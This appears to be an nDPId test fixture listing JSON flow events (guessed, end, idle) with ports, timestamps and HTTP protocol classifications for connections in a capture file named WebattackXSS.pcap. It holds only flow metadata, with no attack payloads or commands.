+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":625,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348037175,"flow_last_seen":1499348042911,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35302,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":625,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348037175,"flow_last_seen":1499348042911,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35302,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":626,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348038438,"flow_last_seen":1499348043911,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35316,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":626,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348038438,"flow_last_seen":1499348043911,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35316,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":627,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348041088,"flow_last_seen":1499348046912,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35342,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":627,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348041088,"flow_last_seen":1499348046912,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35342,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":628,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348042384,"flow_last_seen":1499348047912,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35356,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":628,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348042384,"flow_last_seen":1499348047912,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35356,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":629,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348043670,"flow_last_seen":1499348048912,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35370,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":629,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348043670,"flow_last_seen":1499348048912,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35370,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":630,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348046262,"flow_last_seen":1499348051913,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35396,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":630,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348046262,"flow_last_seen":1499348051913,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35396,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":631,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348047547,"flow_last_seen":1499348052913,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35410,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":631,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348047547,"flow_last_seen":1499348052913,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35410,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":632,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348050079,"flow_last_seen":1499348055913,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35436,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":632,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348050079,"flow_last_seen":1499348055913,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35436,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":633,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348051362,"flow_last_seen":1499348056913,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35450,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":633,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348051362,"flow_last_seen":1499348056913,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35450,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":634,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348052641,"flow_last_seen":1499348057914,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35464,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":634,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348052641,"flow_last_seen":1499348057914,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35464,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":635,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348055228,"flow_last_seen":1499348060913,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35490,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":635,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348055228,"flow_last_seen":1499348060913,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35490,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":636,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348056534,"flow_last_seen":1499348061914,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35504,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":636,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348056534,"flow_last_seen":1499348061914,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35504,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":637,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348057789,"flow_last_seen":1499348062914,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35518,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":637,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348057789,"flow_last_seen":1499348062914,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35518,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":638,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348059068,"flow_last_seen":1499348064914,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35532,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":638,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348059068,"flow_last_seen":1499348064914,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35532,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":639,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348060393,"flow_last_seen":1499348065915,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35546,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":639,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348060393,"flow_last_seen":1499348065915,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35546,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":640,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348061684,"flow_last_seen":1499348066915,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35560,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":640,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348061684,"flow_last_seen":1499348066915,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35560,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":641,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348064243,"flow_last_seen":1499348069916,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35586,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":641,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348064243,"flow_last_seen":1499348069916,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35586,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":642,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348065546,"flow_last_seen":1499348070917,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35600,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":642,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348065546,"flow_last_seen":1499348070917,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35600,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00813{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":643,"flow_state":"finished","flow_packets_processed":133,"flow_first_seen":1499348068136,"flow_last_seen":1499348099366,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":99154,"flow_avg_l4_payload_len":745,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35626,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": 
{"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":644,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348069426,"flow_last_seen":1499348074917,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35640,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":644,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348069426,"flow_last_seen":1499348074917,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35640,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":645,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348070791,"flow_last_seen":1499348075918,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35654,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by 
port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":645,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348070791,"flow_last_seen":1499348075918,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35654,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":646,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348072088,"flow_last_seen":1499348077919,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35668,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":646,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348072088,"flow_last_seen":1499348077919,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35668,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":647,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348073365,"flow_last_seen":1499348078919,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35682,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 